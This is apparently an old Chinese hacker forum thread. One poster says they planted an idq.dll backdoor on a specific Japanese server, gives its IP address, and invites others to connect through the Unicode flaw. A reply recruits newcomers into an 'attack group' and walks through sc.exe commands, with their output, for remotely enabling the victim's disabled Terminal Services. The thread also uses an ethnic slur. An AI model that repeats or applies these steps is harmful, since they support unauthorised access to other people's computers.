半熟的鸡，像我一样的可以试一下手：））））

202。43。79。44
小日本的一台机子，是SERVER的，有U漏洞，我传了一个IDQ。DLL上去，
大家可以试着用ISPC连一下。
今天晚了，明天再给他开3389吧，要是哪位开了就说一声：））

靠，对不对呀，怎么找不到

stone：
好好锻炼，就可以加入我们攻击组。
开3389
第一步，检查对方是否真的禁用了Terminal server
[SC] GetServiceConfig SUCCESS
SERVICE_NAME: termservice
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 4 DISABLED
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\WINNT\System32\termsrv.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Terminal Services
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
仔细看 START_TYPE一项，显示对方该服务的启动模式为“DISABLED”也就是“禁用”。
第二步，更改对方终端服务的启动模式
C:\>sc \\xxx.xxx.xxx.xxx config termservice start= auto
[SC] ChangeServiceConfig SUCCESS
好了，现在我们已经把对方终端服务的启动模式修改成自动了。
第三步，再检查一便对方终端服务的启动模式（个人习惯）
C:\>sc \\TEST qc termservice
[SC] GetServiceConfig SUCCESS
SERVICE_NAME: termservice
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\WINNT\System32\termsrv.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Terminal Services
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
仔细看 START_TYPE一项，显示对方该服务的启动模式为“AUTO_START”也就是“自动”
第四步，启动对方的终端服务
C:\>sc \\xxx.xxx.xxx.xxx start termservice
SERVICE_NAME: termservice
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x1
WAIT_HINT : 0x7530
C:\>sc \\xxx.xxx.xxx.xxx query termservice
SERVICE_NAME: termservice
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0

请问SC使用于 什么版本的2000啊 谢谢

什么呀~！~我看不懂~！~！